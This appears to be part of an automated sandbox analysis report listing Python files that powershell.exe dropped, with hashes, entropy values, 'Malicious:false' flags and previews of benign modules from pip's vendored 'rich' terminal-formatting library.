                                                                                                                                                                                                            Preview:from types import TracebackType.from typing import IO, Iterable, Iterator, List, Optional, Type...class NullFile(IO[str]):.. # TODO: "mode", "name" and "closed" are only required for Python 3.6... @property. def mode(self) -> str:. return "".. @property. def name(self) -> str:. return "NullFile".. def closed(self) -> bool:. return False.. def close(self) -> None:. pass.. def isatty(self) -> bool:. return False.. def read(self, __n: int = 1) -> str:. return "".. def readable(self) -> bool:. return False.. def readline(self, __limit: int = 1) -> str:. return "".. def readlines(self, __hint: int = 1) -> List[str]:. return [].. def seek(self, __offset: int, __whence: int = 1) -> int:. return 0.. def seekable(self) -> bool:. return False.. def tell(self) -> int:. return 0.. def truncate(self, __size: Optional[int] = 1) -> int:. return 0.. def writable
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7063
                                                                                                                                                                                                            Entropy (8bit):3.149971870054489
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:/FpoyA1Frrm/F9pON7TGMmvrxvcyg7aGlZG7yrVbcvHc:9poyA1FryF9QN7SRjRXSaGlZG7y5boc
                                                                                                                                                                                                            MD5:E16FBFBE318C86C37B7730154D2D2CE8
                                                                                                                                                                                                            SHA1:EE198B57907E766DA93C0096481F639F84B8FE04
                                                                                                                                                                                                            SHA-256:71D7AFD4940A67426F960B95F62A478339D3767BE52335050C16F422DD8FCE32
                                                                                                                                                                                                            SHA-512:FC1A58CBDE24A5C645E500E6660A20ABE52774E9095EC15EF3AC783AA5505DC04F7E333BFEE61DDC4D4F5B8A7166E9837B3D287A3864BA1181EB27776EC47C43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .palette import Palette...# Taken from https://en.wikipedia.org/wiki/ANSI_escape_code (Windows 10 column).WINDOWS_PALETTE = Palette(. [. (12, 12, 12),. (197, 15, 31),. (19, 161, 14),. (193, 156, 0),. (0, 55, 218),. (136, 23, 152),. (58, 150, 221),. (204, 204, 204),. (118, 118, 118),. (231, 72, 86),. (22, 198, 12),. (249, 241, 165),. (59, 120, 255),. (180, 0, 158),. (97, 214, 214),. (242, 242, 242),. ].)..# # The standard ansi colors (including bright variants).STANDARD_PALETTE = Palette(. [. (0, 0, 0),. (170, 0, 0),. (0, 170, 0),. (170, 85, 0),. (0, 0, 170),. (170, 0, 170),. (0, 170, 170),. (170, 170, 170),. (85, 85, 85),. (255, 85, 85),. (85, 255, 85),. (255, 255, 85),. (85, 85, 255),. (255, 85, 255),. (85, 255, 255),. (255, 255, 255),. ].)...# The
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):423
                                                                                                                                                                                                            Entropy (8bit):4.254804833051141
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB8yqkgh0L+/FHYfCSFjxc2yXWFdurHNoo:1REr5h0at4bjZEWDeNoo
                                                                                                                                                                                                            MD5:285AD4F0FBA46377D8DE4DED53A60EC1
                                                                                                                                                                                                            SHA1:72A297844FDB3FC6556944CE2E9799A93423B522
                                                                                                                                                                                                            SHA-256:7AF0EDF10378945E428B0AD421794E2429ED8AD0423AC23764B3C42005512C95
                                                                                                                                                                                                            SHA-512:466B2A92401866BB7D3FC4910E465F3FC51194E8BB20ADF1C0A72990153E007893AA823B4AB1E63137B9F8BD1F2710E11C22AA16DBA5830CD5F775981AB2E71D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Optional...def pick_bool(*values: Optional[bool]) -> bool:. """Pick the first non-none bool or return the last value... Args:. *values (bool): Any number of boolean or None values... Returns:. bool: First non-none boolean.. """. assert values, "1 or more values required". for value in values:. if value is not None:. return value. return bool(value).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5472
                                                                                                                                                                                                            Entropy (8bit):4.345543043020853
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:kc+U2pkep6VzQWSNFN8K4tTBWf0HFcxA6TDQW+vHnoahqahyGhtWGAb:kM2pVGcFN8vtiaspTAoG/mb
                                                                                                                                                                                                            MD5:6CBB7E0A774CCA2AA96EDEF2A2DFE231
                                                                                                                                                                                                            SHA1:1D02F4E916F8625597D45207403515EBD23B47A0
                                                                                                                                                                                                            SHA-256:DA52D29622F4DB963E60C7DD7C66EEB644037AF85CC83A9CF83B54616F6653BD
                                                                                                                                                                                                            SHA-512:DC729F872A1BB836A97F8B26B0134A0446A9817779067836749C5E8809FA861248D2974DEA5D52487E2BCBDCE3EBF08EF7D58A09775114AE38D3B82B33F76CEC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from fractions import Fraction.from math import ceil.from typing import cast, List, Optional, Sequence..if sys.version_info >= (3, 8):. from typing import Protocol.else:. from pip._vendor.typing_extensions import Protocol # pragma: no cover...class Edge(Protocol):. """Any object that defines an edge (such as Layout).""".. size: Optional[int] = None. ratio: int = 1. minimum_size: int = 1...def ratio_resolve(total: int, edges: Sequence[Edge]) -> List[int]:. """Divide total space to satisfy size, ratio, and minimum_size, constraints... The returned list of integers should add up to total in most cases, unless it is. impossible to satisfy all the constraints. For instance, if there are two edges. with a minimum size of 20 each and `total` is 30 then the returned list will be. greater than total. In practice, this would mean that a Layout object would. clip the rows that would overflow the screen height... Args:. total (int): Total n
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19919
                                                                                                                                                                                                            Entropy (8bit):4.397311056253839
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:JQHdqUKb3Uk4BnuSZt3nX9LwYBPcjhQZkGU0:J4qUKb3UjcAwYBUNukGU0
                                                                                                                                                                                                            MD5:5DBF3829FC85EA67DEA473D750F7A8CA
                                                                                                                                                                                                            SHA1:7DC392FF666A492C8348338FBD08F412F81D6F34
                                                                                                                                                                                                            SHA-256:536AF5FE0FF5CD28EC8E251D00449CDA200C7378B8AE2FD2F0F60FEA4439CF52
                                                                                                                                                                                                            SHA-512:6206A4F97FB1AC4743A0FFA5DB22B30CA357F21B255470C92289E3ABC442CE3F2676B79C030FB6E5BDFE6C35AEB980A7D9CBD16F6AA569CE37064293BF722A39
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".Spinners are from:.* cli-spinners:. MIT License. Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com). Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights to. use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of. the Software, and to permit persons to whom the Software is furnished to do so,. subject to the following conditions:. The above copyright notice and this permission notice shall be included. in all copies or substantial portions of the Software.. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,. INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR. PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):351
                                                                                                                                                                                                            Entropy (8bit):4.502417336150625
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:1REYB9iAoX0IDXwfbKKpcuK5MaRzBrwfrFFWSY9cqvrleVZVsgxXbRn:1REYB9j7IHyYSaziFw39cilQVsiRn
                                                                                                                                                                                                            MD5:DC38E75C7F9B0AACE5F9CBE9FA826460
                                                                                                                                                                                                            SHA1:3A77A4CD0CDAEA78FAD6D0088F35BC0035FB62F6
                                                                                                                                                                                                            SHA-256:F82F0E2BBAF19F7B0851D570C59041A5E1E12335F4788F9533731E9987DA5E6D
                                                                                                                                                                                                            SHA-512:A2EABE50F90DA82786344E3CB8803128F0A62A1672A97D7A3E32E53EFA2A25305FEEEF6950CE4485D3A4D599789056077345E60000458096C0FE632A13385249
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import List, TypeVar..T = TypeVar("T")...class Stack(List[T]):. """A small shim over builtin list.""".. @property. def top(self) -> T:. """Get top of stack.""". return self[-1].. def push(self, item: T) -> None:. """Push an item on to the stack (append in stack nomenclature).""". self.append(item).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):417
                                                                                                                                                                                                            Entropy (8bit):4.633256996778715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:2c577BmQEYBtLYjyJrW8OWSRm9K0zjCW9n:20AFyLIkW7GLCE
                                                                                                                                                                                                            MD5:AE43057547AF31FDAD66B2DF35D85A23
                                                                                                                                                                                                            SHA1:B93F8DDD7BC4EA918A9B40A1A5B993D7B7E93B19
                                                                                                                                                                                                            SHA-256:CDE9716D3EA83C566736BC163E973592D51E013F957387EE15C4592D018BB4C2
                                                                                                                                                                                                            SHA-512:39DF3D08C148E46C612E1AC5FF0887BD456CC0F618C555D25E1C2308E6F5F819A23BBCB9FF2FBE7E463F4E6C95B081A5FBB5FFE5DD5CF497299570379B601148
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".Timer context manager, only used in debug..."""..from time import time..import contextlib.from typing import Generator...@contextlib.contextmanager.def timer(subject: str = "time") -> Generator[None, None, None]:. """print the elapsed time. (only used in debugging)""". start = time(). yield. elapsed = time() - start. elapsed_ms = elapsed * 1000. print(f"{subject} elapsed {elapsed_ms:.1f}ms").
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22820
                                                                                                                                                                                                            Entropy (8bit):4.774733548133601
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CkDHvbDnTosM5NoDCu2B++69Bkoh6cwE8VXxR:xLzDn9M514+O2YNDkxR
                                                                                                                                                                                                            MD5:5C80E3525391E8B4C7844A23F0519595
                                                                                                                                                                                                            SHA1:836CE92945CD9083AF38A54FB64FD9408058679E
                                                                                                                                                                                                            SHA-256:3F4BF12367DC9DDCA6D545354B7ED703343342793263B62A00A9B19B6E3F82E8
                                                                                                                                                                                                            SHA-512:3EDB48442291075133F4F5C751E44EBDE620BECB8196BAFC8DC5CDA94774CD4E249C7CB5D7919EC4220775E6E0738EEA9CA43E52DD3592B882137C628213A04D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Light wrapper around the Win32 Console API - this module should only be imported on Windows..The API that this module wraps is documented at https://docs.microsoft.com/en-us/windows/console/console-functions.""".import ctypes.import sys.from typing import Any..windll: Any = None.if sys.platform == "win32":. windll = ctypes.LibraryLoader(ctypes.WinDLL).else:. raise ImportError(f"{__name__} can only be imported on Windows")..import time.from ctypes import Structure, byref, wintypes.from typing import IO, NamedTuple, Type, cast..from pip._vendor.rich.color import ColorSystem.from pip._vendor.rich.style import Style..STDOUT = -11.ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4..COORD = wintypes._COORD...class LegacyWindowsError(Exception):. pass...class WindowsCoordinates(NamedTuple):. """Coordinates in the Windows Console API are (y, x), not (x, y).. This class is intended to prevent that confusion.. Rows and columns are indexed from 0.. This class can be used in place of w
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1926
                                                                                                                                                                                                            Entropy (8bit):4.628659584345255
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:kH/SVumcqzpJbio2Z2tz6G8n2d3h6l8bpfuOUBJ:kH/IumcqtJe2n3tuOUBJ
                                                                                                                                                                                                            MD5:AB18C7F0E8298A34619D48844BD91F2D
                                                                                                                                                                                                            SHA1:BE72394A0A599540CBAE0681DDF7DEA8D5BBAA30
                                                                                                                                                                                                            SHA-256:76F365F5399F3F3355C622A4E560C58A112B679EFDEA0D940BDF8A186C9F5E69
                                                                                                                                                                                                            SHA-512:2B67E01C9754965C7804D8E8B7AE88344112A6F60D2C040F1D76BAFF62183A5F1502522F089937E9D5FEBBFA2C5C5FDB927B7FBD4C9AD159C1158290AFB52E73
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from dataclasses import dataclass...@dataclass.class WindowsConsoleFeatures:. """Windows features available.""".. vt: bool = False. """The console supports VT codes.""". truecolor: bool = False. """The console supports truecolor."""...try:. import ctypes. from ctypes import LibraryLoader.. if sys.platform == "win32":. windll = LibraryLoader(ctypes.WinDLL). else:. windll = None. raise ImportError("Not windows").. from pip._vendor.rich._win32_console import (. ENABLE_VIRTUAL_TERMINAL_PROCESSING,. GetConsoleMode,. GetStdHandle,. LegacyWindowsError,. )..except (AttributeError, ImportError, ValueError):.. # Fallback if we can't load the Windows DLL. def get_windows_console_features() -> WindowsConsoleFeatures:. features = WindowsConsoleFeatures(). return features..else:.. def get_windows_console_features() -> WindowsConsoleFeatures:. """Get windows console features...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2783
                                                                                                                                                                                                            Entropy (8bit):4.307190740356801
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:LbridQ8NF+Wytwqc6TAr9gazkr9g57zrLwriFJrB7r7jbr4DFTFgm1jRJ:LKdzFjy+RPCWLuift/Kx7L
                                                                                                                                                                                                            MD5:0F359F6A95E64CAD8BEBA9876575E6DE
                                                                                                                                                                                                            SHA1:F736AF40E625C4DA8C394DDABCC2B9A30D6B009E
                                                                                                                                                                                                            SHA-256:B7BE192F7C6E0C23F79E64E9F691F52F92E223671A909B9045095E1C225EAE59
                                                                                                                                                                                                            SHA-512:5351E6EA738DC0FB5C8506D811867F0468D09A6C5DDEBD207C2004AD9E72EA6375C0013DF6AB5BFBEADF605BF99443379223784384E0F5559AF05A7B97B06BD1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Iterable, Sequence, Tuple, cast..from pip._vendor.rich._win32_console import LegacyWindowsTerm, WindowsCoordinates.from pip._vendor.rich.segment import ControlCode, ControlType, Segment...def legacy_windows_render(buffer: Iterable[Segment], term: LegacyWindowsTerm) -> None:. """Makes appropriate Windows Console API calls based on the segments in the buffer... Args:. buffer (Iterable[Segment]): Iterable of Segments to convert to Win32 API calls.. term (LegacyWindowsTerm): Used to call the Windows Console API.. """. for text, style, control in buffer:. if not control:. if style:. term.write_styled(text, style). else:. term.write_text(text). else:. control_codes: Sequence[ControlCode] = control. for control_code in control_codes:. control_type = control_code[0]. if control_type == ControlType.CURSOR_MOVE_TO:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1840
                                                                                                                                                                                                            Entropy (8bit):4.295698227187082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:wQvZp2o5aNrfMR1idR35/MR/RdRkwjDJFihWGMR7MRBMRcMRQMRg8pfl6uneKcO+:hZp2o5aNrf9xAj+hWGSc53V8llTeYeT7
                                                                                                                                                                                                            MD5:875C3BDFFF0FCAC79427D69E12FF5B79
                                                                                                                                                                                                            SHA1:BA31AAD0CAA1F11410B5AE24B82051B395A77576
                                                                                                                                                                                                            SHA-256:C5F57FF6DD1283AAF38A69AB0EBBBC7C25665256A56007072C37EB2599DB6F04
                                                                                                                                                                                                            SHA-512:441B39E57FA518128FCC75FC22887123E30E7A888884B81351057A54F99D26B2239539EF51B869B876A05AEBC50C2DAB0303E84A3201242B2A86C625B76DE3B2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re.from typing import Iterable, List, Tuple..from ._loop import loop_last.from .cells import cell_len, chop_cells..re_word = re.compile(r"\s*\S+\s*")...def words(text: str) -> Iterable[Tuple[int, int, str]]:. position = 0. word_match = re_word.match(text, position). while word_match is not None:. start, end = word_match.span(). word = word_match.group(0). yield start, end, word. word_match = re_word.match(text, end)...def divide_line(text: str, width: int, fold: bool = True) -> List[int]:. divides: List[int] = []. append = divides.append. line_position = 0. _cell_len = cell_len. for start, _end, word in words(text):. word_length = _cell_len(word.rstrip()). if line_position + word_length > width:. if word_length > width:. if fold:. chopped_words = chop_cells(word, max_size=width, position=0). for last, line in loop_last(chopped_words):.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):890
                                                                                                                                                                                                            Entropy (8bit):4.514182483611388
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1L8Ceed/DG4FeZLlD6EEUNoS1jMOIcsA6Fy930LQIk2peBw3XpPrAlkmpVW2G:1jG4kZRD6zZS1j5Ich6F++pzpcSmLW2G
                                                                                                                                                                                                            MD5:39D8C0ACDCECE37E58B4E2A2796B67FC
                                                                                                                                                                                                            SHA1:9E5742F6C5E276B656A575BD91DEBE5B6935EBE1
                                                                                                                                                                                                            SHA-256:38DF84F99A924A1799F3C56B297D8CDCF5E915B18451464F31AFC07F497EE1FD
                                                                                                                                                                                                            SHA-512:D6D459438E70A273C142D2395121664333EA6EC008218D2281DFE465E1FEA8FC50026FC80D661D9219C49BAEFB9EDDCE4D47B8EEF6B6B177791CBCDEF8BDCB6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from abc import ABC...class RichRenderable(ABC):. """An abstract base class for Rich renderables... Note that there is no need to extend this class, the intended use is to check if an. object supports the Rich renderable protocol. For example::.. if isinstance(my_object, RichRenderable):. console.print(my_object).. """.. @classmethod. def __subclasshook__(cls, other: type) -> bool:. """Check if this class supports the rich render protocol.""". return hasattr(other, "__rich_console__") or hasattr(other, "__rich__")...if __name__ == "__main__": # pragma: no cover. from pip._vendor.rich.text import Text.. t = Text(). print(isinstance(Text, RichRenderable)). print(isinstance(t, RichRenderable)).. class Foo:. pass.. f = Foo(). print(isinstance(f, RichRenderable)). print(isinstance("", RichRenderable)).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10368
                                                                                                                                                                                                            Entropy (8bit):4.2608608706408475
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:kBcq3sNdwsHBdAHaH/HxX/1zr1hW4gBHYh2JVngtPdzDH6:kCzHBdAHaH/HN1WtHTVg1DH6
                                                                                                                                                                                                            MD5:304669A5FDA70CB35AEAB79B1805A0ED
                                                                                                                                                                                                            SHA1:D9EDBCD6116C66BBB0491CE05D4BCEAE13606641
                                                                                                                                                                                                            SHA-256:155EBF192FBCBA123256232783786421648569380CA212B53AACA397C23C9861
                                                                                                                                                                                                            SHA-512:BDF2F82EC5F48C97BF06A1FF284CC1DDEB9B45C06C41AFF228EB3663F208625DB7F7132FA13885FA8305B13743A5EDB7AFEEFAB9F1EDDDB04BB57B9D8FBBB014
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from itertools import chain.from typing import TYPE_CHECKING, Iterable, Optional..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover..from .constrain import Constrain.from .jupyter import JupyterMixin.from .measure import Measurement.from .segment import Segment.from .style import StyleType..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderableType, RenderResult..AlignMethod = Literal["left", "center", "right"].VerticalAlignMethod = Literal["top", "middle", "bottom"]...class Align(JupyterMixin):. """Align a renderable by adding spaces if necessary... Args:. renderable (RenderableType): A console renderable.. align (AlignMethod): One of "left", "center", or "right"". style (StyleType, optional): An optional style to apply to the background.. vertical (Optional[VerticalAlginMethod], optional): Optional vertical align, one of "top
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6819
                                                                                                                                                                                                            Entropy (8bit):4.11891233832726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:06GEiC7otJ7n3HvdfC8i/GfNoDCgXKGHUkTznqr4/pGnYqNyaqryXpefPr:09qcpnX1fCfeeWga4Tzqr4hMpefPr
                                                                                                                                                                                                            MD5:B8D039CDAA739F19AFC00600B23A4856
                                                                                                                                                                                                            SHA1:CDD5974D502A1E2ECAE7FAE6DB0FB013C0B67844
                                                                                                                                                                                                            SHA-256:4C77B1EFEAA373CDBE651B660CF01895510E6D838413F011075EBDD8593E247B
                                                                                                                                                                                                            SHA-512:12841C2BEBA9A79D8E1AF2EDB370DC40E85BE7D01270B5FF9A1788BFEFC28F250DD6427B980D44C6F47C52A8AFBC03FAC8ED355410D51D4412720C3EB4B89967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re.import sys.from contextlib import suppress.from typing import Iterable, NamedTuple, Optional..from .color import Color.from .style import Style.from .text import Text..re_ansi = re.compile(. r""".(?:\x1b\](.*?)\x1b\\)|.(?:\x1b([(@-Z\\-_]|\[[0-?]*[ -/]*[@-~])).""",. re.VERBOSE,.)...class _AnsiToken(NamedTuple):. """Result of ansi tokenized string.""".. plain: str = "". sgr: Optional[str] = "". osc: Optional[str] = ""...def _ansi_tokenize(ansi_text: str) -> Iterable[_AnsiToken]:. """Tokenize a string in to plain text and ANSI codes... Args:. ansi_text (str): A String containing ANSI codes... Yields:. AnsiToken: A named tuple of (plain, sgr, osc). """.. position = 0. sgr: Optional[str]. osc: Optional[str]. for match in re_ansi.finditer(ansi_text):. start, end = match.span(0). osc, sgr = match.groups(). if start > position:. yield _AnsiToken(ansi_text[position:start]). if sgr:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                                                            Entropy (8bit):4.755311796963686
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:gM1WnLqJkYUMOnSSFgBYwSYau+RFWnAVinpzBzE7SlGDaaiAmx:gM1WqJrhOpF3vWAVSzW7S8Daai5x
                                                                                                                                                                                                            MD5:48B51F3A119071D36DC9C3A5B4ADE62A
                                                                                                                                                                                                            SHA1:D42CE6F8F095838ECDEDAEAD910F6AB10686AD53
                                                                                                                                                                                                            SHA-256:6BB503DF4DC171C442AC48468DF304969BF94456088A7680840BAA62A854BE6C
                                                                                                                                                                                                            SHA-512:2F718F3D090B4C631295DDEC194AB25087806B29A07F99D845AD23E0C360BB63650DCF2D82A000ABD1851EECA2D164107BA5A2B061B40DB669D5E966F2F70593
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Optional, Union..from .color import Color.from .console import Console, ConsoleOptions, RenderResult.from .jupyter import JupyterMixin.from .measure import Measurement.from .segment import Segment.from .style import Style..# There are left-aligned characters for 1/8 to 7/8, but.# the right-aligned characters exist only for 1/8 and 4/8..BEGIN_BLOCK_ELEMENTS = [".", ".", ".", ".", ".", ".", ".", "."].END_BLOCK_ELEMENTS = [" ", ".", ".", ".", ".", ".", ".", "."].FULL_BLOCK = "."...class Bar(JupyterMixin):. """Renders a solid block bar... Args:. size (float): Value for the end of the bar.. begin (float): Begin point (between 0 and size, inclusive).. end (float): End point (between 0 and size, inclusive).. width (int, optional): Width of the bar, or ``None`` for maximum width. Defaults to None.. color (Union[Color, str], optional): Color of the bar. Defaults to "default".. bgcolor (Union[Color
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9842
                                                                                                                                                                                                            Entropy (8bit):4.98595020454903
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:krdZVAxTnljBlWadBD7UhSxyfcCP0BcsFLu/KnoX21FEFh4S:kr3VAxTljBL5kcesFZc2a4S
                                                                                                                                                                                                            MD5:30023D8C772E704976DC7DA2AC632CDF
                                                                                                                                                                                                            SHA1:E24F95DECD0F048B328CB40EDD2C424F3630858B
                                                                                                                                                                                                            SHA-256:149EA72378C3EE1D97345535DFC6C952DD8762658E9516E5B68084B8801985EC
                                                                                                                                                                                                            SHA-512:A7622A0E59D20448FEE9FE426C4A77CA5EDF85BFE162304CCB7A2F04A181D72D1435DD0F8A0E33A7D218C0B24A3A9268100F112F64692097415B3977145BC31D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from typing import TYPE_CHECKING, Iterable, List..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover...from ._loop import loop_last..if TYPE_CHECKING:. from pip._vendor.rich.console import ConsoleOptions...class Box:. """Defines characters to render boxes... .... top. . .. head. .... head_row. . .. mid. .... row. .... foot_row. . .. foot. .... bottom.. Args:. box (str): Characters making up box.. ascii (bool, optional): True if this box uses ascii characters only. Default is False.. """.. def __init__(self, box: str, *, ascii: bool = False) -> None:. self._box = box. self.ascii = ascii. line1, line2, line3, line4, line5, line6, line7, line8 = box.splitlines(). # top. self.top_left, self.top, self.top_divider, self.top_right = iter(line1).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4503
                                                                                                                                                                                                            Entropy (8bit):4.819596905908533
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:G44UbhWUoBh+GwRPGYK3p3AAtHO+K9Z8DGCB3C:fHh6BhmRMp3AAhO+3GCE
                                                                                                                                                                                                            MD5:872D6DAAC667F5A9B584FB4EEDDEFC05
                                                                                                                                                                                                            SHA1:151A168F52F4FBFADCF951C584B4BAA2E21726A0
                                                                                                                                                                                                            SHA-256:CCC8C5235E700A98232D1D7894775F14C542EAA3038B93AC2880743D864104C9
                                                                                                                                                                                                            SHA-512:5CEF9ED5E1E94B5F0C9729FBF464977B413CFC58BFB4C76C9545C41319129E86D6D2CB44FAB3E6FA2D83CAA8E84C8CAD08BD5D031F5B308A2ECFEC5CCBE96EA8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re.from functools import lru_cache.from typing import Callable, List..from ._cell_widths import CELL_WIDTHS..# Regex to match sequence of the most common character ranges._is_single_cell_widths = re.compile("^[\u0020-\u006f\u00a0\u02ff\u0370-\u0482]*$").match...@lru_cache(4096).def cached_cell_len(text: str) -> int:. """Get the number of cells required to display text... This method always caches, which may use up a lot of memory. It is recommended to use. `cell_len` over this method... Args:. text (str): Text to display... Returns:. int: Get the number of cells required to display text.. """. _get_size = get_character_cell_size. total_size = sum(_get_size(character) for character in text). return total_size...def cell_len(text: str, _cell_len: Callable[[str], int] = cached_cell_len) -> int:. """Get the number of cells required to display text... Args:. text (str): Text to display... Returns:. int: Get the number of
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
